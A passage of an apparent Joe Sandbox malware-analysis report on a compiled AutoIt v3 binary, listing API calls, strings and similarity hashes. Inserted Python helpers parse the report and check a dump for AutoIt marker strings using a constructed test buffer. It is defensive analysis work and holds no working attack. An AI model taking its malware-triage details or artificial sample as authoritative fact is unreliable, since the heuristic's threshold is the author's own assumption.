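    return [e for e in entries if e["based_on_pe"] is False]


def opcode_index(entries: List[Dict]) -> Dict[str, Dict]:
    """Opcode ID -> {offset, api_id}; diff two reports' indexes to spot shared code."""
    return {e["opcode_id"]: {"offset": e["offset"], "api_id": e["api_id"]} for e in entries}


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for e in functions_calling(recs, "LogonUserW"):
        print("LogonUserW caller:", e["opcode_id"], "at", hex(e["offset"]))
    for e in unbacked_functions(recs):
        print("non-PE-backed code:", e["dump"], e["instruction_fuzzy"])
```

                                                                      Feed the whole report text to parse_report and compare opcode_index outputs from two analyses: Opcode IDs that match across samples flag shared functions, and the entries from the 015AE000 region (based on PE: false) are the ones worth checking first, since that is code living outside any loaded image.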
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,0102F910), ref: 01023627
                                                                      • IsWindowVisible.USER32(?), ref: 0102364B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                      • API String ID: 4105515805-45149045
                                                                      • Opcode ID: 4b4089e46acc32baaaaf442609e710805428635a06a4d9f89b42b531d56238f2
                                                                      • Instruction ID: 58043a03722bf4dccb7da8e57082d6d3e500b6956aff2dcf8ce744147b3d198a
                                                                      • Opcode Fuzzy Hash: 4b4089e46acc32baaaaf442609e710805428635a06a4d9f89b42b531d56238f2
                                                                      • Instruction Fuzzy Hash: DBD18B70208311CBCB14EF14C956A6EBBE5BF89384F044468F9C65F3A2CB2DE90ADB51
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0102A630
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0102A661
                                                                      • GetSysColor.USER32(0000000F), ref: 0102A66D
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0102A687
                                                                      • SelectObject.GDI32(?,00000000), ref: 0102A696
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0102A6C1
                                                                      • GetSysColor.USER32(00000010), ref: 0102A6C9
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0102A6D0
                                                                      • FrameRect.USER32(?,?,00000000), ref: 0102A6DF
                                                                      • DeleteObject.GDI32(00000000), ref: 0102A6E6
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0102A731
                                                                      • FillRect.USER32(?,?,00000000), ref: 0102A763
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0102A78E
                                                                        • Part of subcall function 0102A8CA: GetSysColor.USER32(00000012), ref: 0102A903
                                                                        • Part of subcall function 0102A8CA: SetTextColor.GDI32(?,?), ref: 0102A907
                                                                        • Part of subcall function 0102A8CA: GetSysColorBrush.USER32(0000000F), ref: 0102A91D
                                                                        • Part of subcall function 0102A8CA: GetSysColor.USER32(0000000F), ref: 0102A928
                                                                        • Part of subcall function 0102A8CA: GetSysColor.USER32(00000011), ref: 0102A945
                                                                        • Part of subcall function 0102A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0102A953
                                                                        • Part of subcall function 0102A8CA: SelectObject.GDI32(?,00000000), ref: 0102A964
                                                                        • Part of subcall function 0102A8CA: SetBkColor.GDI32(?,00000000), ref: 0102A96D
                                                                        • Part of subcall function 0102A8CA: SelectObject.GDI32(?,?), ref: 0102A97A
                                                                        • Part of subcall function 0102A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0102A999
                                                                        • Part of subcall function 0102A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0102A9B0
                                                                        • Part of subcall function 0102A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0102A9C5
                                                                        • Part of subcall function 0102A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0102A9ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: a506441c1f7f81b4956bd22ea16779c06de61fe6b837a0163f9bf0a7f93dccf3
                                                                      • Instruction ID: 8c737bc2030b5fc58c2dd347ae1175eec8ccb5b7e262790d8215d70b42370d1d
                                                                      • Opcode Fuzzy Hash: a506441c1f7f81b4956bd22ea16779c06de61fe6b837a0163f9bf0a7f93dccf3
                                                                      • Instruction Fuzzy Hash: 45918D72108312EFD7219F64DC08E5B7BF9FF89361F200A19FAA296194DB7AD844CB51
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?), ref: 00FA2CA2
                                                                      • DeleteObject.GDI32(00000000), ref: 00FA2CE8
                                                                      • DeleteObject.GDI32(00000000), ref: 00FA2CF3
                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00FA2CFE
                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00FA2D09
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FDC43B
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FDC474
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FDC89D
                                                                        • Part of subcall function 00FA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FA2036,?,00000000,?,?,?,?,00FA16CB,00000000,?), ref: 00FA1B9A
                                                                      • SendMessageW.USER32(?,00001053), ref: 00FDC8DA
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FDC8F1
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FDC907
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FDC912
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 464785882-4108050209
                                                                      • Opcode ID: e1b3287af43bb4c09e51b7deb3c3d0b87d260d1bb54fcfdf3dab86b3d627388a
                                                                      • Instruction ID: a8e471a248838c62af17c2d61602db85342fb17c389d3510f411a0cf66082228
                                                                      • Opcode Fuzzy Hash: e1b3287af43bb4c09e51b7deb3c3d0b87d260d1bb54fcfdf3dab86b3d627388a
                                                                      • Instruction Fuzzy Hash: E912A170A04202EFDB25CF28C884BA9B7E6FF05360F58456AF599CB652C735EC41EB91
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 010174DE
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0101759D
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010175DB
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010175ED
                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01017633
                                                                      • GetClientRect.USER32(00000000,?), ref: 0101763F
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01017683
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01017692
                                                                      • GetStockObject.GDI32(00000011), ref: 010176A2
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 010176A6
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010176B6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010176BF
                                                                      • DeleteDC.GDI32(00000000), ref: 010176C8
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010176F4
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0101770B
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01017746
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0101775A
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0101776B
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0101779B
                                                                      • GetStockObject.GDI32(00000011), ref: 010177A6
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010177B1
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010177BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 56aaafdb8da3378a90feb8eaf85fca2b94e3ddb20eaf91956cb3445fc2422bf5
                                                                      • Instruction ID: 6cb34f0b771f67f848a5c06ba3f605adb01256967813ea12ba58b39c069a1e6f
                                                                      • Opcode Fuzzy Hash: 56aaafdb8da3378a90feb8eaf85fca2b94e3ddb20eaf91956cb3445fc2422bf5
                                                                      • Instruction Fuzzy Hash: B6A161B1A40215BFEB24DFA5DC4AFAF7BB9EB05750F104114FA54A72D4C6B9AD00CB60
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0100AD1E
                                                                      • GetDriveTypeW.KERNEL32(?,0102FAC0,?,\\.\,0102F910), ref: 0100ADFB
                                                                      • SetErrorMode.KERNEL32(00000000,0102FAC0,?,\\.\,0102F910), ref: 0100AF59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 4d837a12768b77749c54c72c8efe4701bac18815392801a709b10f77f6ae4954
                                                                      • Instruction ID: 864c54e0a49c3975ec1016b066bcf527df8792c2f00ec3966785f876e712cfeb
                                                                      • Opcode Fuzzy Hash: 4d837a12768b77749c54c72c8efe4701bac18815392801a709b10f77f6ae4954
                                                                      • Instruction Fuzzy Hash: 9F51AFF0748305EBAB92EBA6C942DBE77A5EB09600F10805FECC7AB2D1D6719901DB51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 1038674560-86951937
                                                                      • Opcode ID: 43feb6eeac0d837d0e882aae7f3db825f67e02c8c09f21fc34caa6505e8c25cd
                                                                      • Instruction ID: d496460b49ef8662753a36e787541dac6167fe7eba0994cc937c6eeca6c3fba5
                                                                      • Opcode Fuzzy Hash: 43feb6eeac0d837d0e882aae7f3db825f67e02c8c09f21fc34caa6505e8c25cd
                                                                      • Instruction Fuzzy Hash: 668119F1640206AACB11BB21EC43FBF3769AF16750F084029F945EE192EB68DE45F651
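The two entries above carry the strings that mark this binary as a compiled AutoIt v3 script: the "AutoIt v3" window title and msctls_progress32 splash-screen control created by the CreateWindowExW routine, and the script directives (#include-once, #requireadmin, #OnAutoItStartRegister and the rest) matched by the __wcsnicmp directive parser. The following triage script is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own detection logic: it searches a file or memory dump for those marker strings in both ASCII and UTF-16LE (the runtime uses the W API, so the strings are wide in the binary) and applies a scoring threshold that is my own assumption. The test buffer it builds is constructed, not taken from the sample.

```python
"""Triage heuristic: does a file or memory dump carry the AutoIt v3
interpreter markers listed in the report entries above?

Added example; not part of the Joe Sandbox report. The marker strings are
copied from the report's String IDs (window title "AutoIt v3", the
msctls_progress32 splash-screen progress bar, and the script directives
handled by the __wcsnicmp directive parser). The scoring threshold is my own
assumption, not a Joe Sandbox rule.
"""
import sys

# Runtime UI strings from the CreateWindowExW entry.
RUNTIME_MARKERS = ("AutoIt v3", "msctls_progress32")

# Script directives from the directive-parser entry (the parser's error
# strings are left out: they are less specific).
DIRECTIVE_MARKERS = (
    "#OnAutoItStartRegister",
    "#include-once",
    "#notrayicon",
    "#pragma compile",
    "#requireadmin",
    "#comments-start",
    "#comments-end",
)


def _encodings(marker: str) -> tuple:
    """The runtime uses the W (UTF-16LE) API, but check ASCII too."""
    return (marker.encode("ascii"), marker.encode("utf-16-le"))


def find_autoit_markers(data: bytes) -> dict:
    """Return the markers present in `data` and a likely-AutoIt verdict."""
    hits = {
        group: [m for m in markers if any(e in data for e in _encodings(m))]
        for group, markers in (
            ("runtime", RUNTIME_MARKERS),
            ("directive", DIRECTIVE_MARKERS),
        )
    }
    # Assumption: the window title alone is weak (it also appears in AutoIt's
    # legitimate tooling), so require at least two directives as well.
    hits["likely_autoit"] = (
        "AutoIt v3" in hits["runtime"] and len(hits["directive"]) >= 2
    )
    return hits


def build_sample() -> bytes:
    """Constructed test buffer, not a real sample: a fake PE header, filler,
    and a few of the markers stored as NUL-terminated UTF-16LE strings."""
    blob = b"MZ" + b"\x00" * 62
    for s in ("AutoIt v3", "#include-once", "#requireadmin", "static"):
        blob += s.encode("utf-16-le") + b"\x00\x00"
    return blob + b"\xff" * 32


if __name__ == "__main__":
    # Usage: python autoit_markers.py <file-or-dump>; with no argument the
    # constructed sample is scanned instead.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_sample()
    result = find_autoit_markers(data)
    print(f"runtime markers:   {result['runtime']}")
    print(f"directive markers: {result['directive']}")
    print(f"likely compiled AutoIt script: {result['likely_autoit']}")
```

Run it against the unpacked file or against one of the .sdmp memory dumps listed under Memory Dump Source; the directive strings live in the interpreter, so they are present whether or not the embedded script is obfuscated, which is what makes them useful for triage before any script extraction.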
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01029AD2
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01029B8B
                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 01029BA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: 0
                                                                      • API String ID: 2326795674-4108050209
                                                                      • Opcode ID: 14b37537234b61af0458856baf26d59e8b9ffda7747466548c110c1ae1c0de21
                                                                      • Instruction ID: d072f32c2cbe6148e33ed06d392708ad07457dad0e097caf19ac239a2410906a
                                                                      • Opcode Fuzzy Hash: 14b37537234b61af0458856baf26d59e8b9ffda7747466548c110c1ae1c0de21
                                                                      • Instruction Fuzzy Hash: 6502E030104321AFEBA58F28C848FAABFE5FF49358F04455DFAD9962A1C779D844CB91
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 0102A903
                                                                      • SetTextColor.GDI32(?,?), ref: 0102A907
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0102A91D
                                                                      • GetSysColor.USER32(0000000F), ref: 0102A928
                                                                      • CreateSolidBrush.GDI32(?), ref: 0102A92D
                                                                      • GetSysColor.USER32(00000011), ref: 0102A945
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0102A953
                                                                      • SelectObject.GDI32(?,00000000), ref: 0102A964
                                                                      • SetBkColor.GDI32(?,00000000), ref: 0102A96D
                                                                      • SelectObject.GDI32(?,?), ref: 0102A97A
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0102A999
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0102A9B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0102A9C5
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0102A9ED
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0102AA14
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0102AA32
                                                                      • DrawFocusRect.USER32(?,?), ref: 0102AA3D
                                                                      • GetSysColor.USER32(00000011), ref: 0102AA4B
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0102AA53
                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0102AA67
                                                                      • SelectObject.GDI32(?,0102A5FA), ref: 0102AA7E
                                                                      • DeleteObject.GDI32(?), ref: 0102AA89
                                                                      • SelectObject.GDI32(?,?), ref: 0102AA8F
                                                                      • DeleteObject.GDI32(?), ref: 0102AA94
                                                                      • SetTextColor.GDI32(?,?), ref: 0102AA9A
                                                                      • SetBkColor.GDI32(?,?), ref: 0102AAA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 1d0b83b59eedfce69313ea436a00f349cd3849421845e9e1ea621cb95941b3c9
                                                                      • Instruction ID: 508c0c2cb1d96e65a92983cc133951027ff5f25cb16d2b18b99d829abaeb8d82
                                                                      • Opcode Fuzzy Hash: 1d0b83b59eedfce69313ea436a00f349cd3849421845e9e1ea621cb95941b3c9
                                                                      • Instruction Fuzzy Hash: 9E518E71900219FFDB219FA4DC48EAE7BB9FF08360F214255FA51AB295C77A9940CF50
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01028AC1
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01028AD2
                                                                      • CharNextW.USER32(0000014E), ref: 01028B01
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01028B42
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01028B58
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01028B69
                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01028B86
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 01028BD8
                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01028BEE
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 01028C1F
                                                                      • _memset.LIBCMT ref: 01028C44
                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01028C8D
                                                                      • _memset.LIBCMT ref: 01028CEC
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01028D16
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 01028D6E
                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 01028E1B
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 01028E3D
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01028E87
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01028EB4
                                                                      • DrawMenuBar.USER32(?), ref: 01028EC3
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 01028EEB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                      • String ID: 0
                                                                      • API String ID: 1073566785-4108050209
                                                                      • Opcode ID: 7bb6186406240c4327a91f94a22f6a7ed72ffbb06da5a88b1cc3589f5bed066e
                                                                      • Instruction ID: 19bf7332b0a513839897bd9dd29cee1c497136eae1b231340ff98102ea00f29b
                                                                      • Opcode Fuzzy Hash: 7bb6186406240c4327a91f94a22f6a7ed72ffbb06da5a88b1cc3589f5bed066e
                                                                      • Instruction Fuzzy Hash: 1AE1C274900229AFEF609F64CC84EEE7BF9EF08750F10819AFA95AB191DB748584CF50
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 010249CA
                                                                      • GetDesktopWindow.USER32 ref: 010249DF
                                                                      • GetWindowRect.USER32(00000000), ref: 010249E6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 01024A48
                                                                      • DestroyWindow.USER32(?), ref: 01024A74
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01024A9D
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01024ABB
                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01024AE1
                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 01024AF6
                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01024B09
                                                                      • IsWindowVisible.USER32(?), ref: 01024B29
                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01024B44
                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01024B58
                                                                      • GetWindowRect.USER32(?,?), ref: 01024B70
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 01024B96
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 01024BB0
                                                                      • CopyRect.USER32(?,?), ref: 01024BC7
                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 01024C32
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: 06e553bd8d9aa1a5f16c046b5de1ea0c7a38331c628b926e1d98f439314b4fad
                                                                      • Instruction ID: e112900584e1e8d54598f36910ef1a78a4725ce1726e8229aa915d8461d6acff
                                                                      • Opcode Fuzzy Hash: 06e553bd8d9aa1a5f16c046b5de1ea0c7a38331c628b926e1d98f439314b4fad
                                                                      • Instruction Fuzzy Hash: 19B1A970608351AFDB54DF68C888B6ABBE4FF89310F008A1CF9D99B291D775E805CB95
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 010044AC
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010044D2
                                                                      • _wcscpy.LIBCMT ref: 01004500
                                                                      • _wcscmp.LIBCMT ref: 0100450B
                                                                      • _wcscat.LIBCMT ref: 01004521
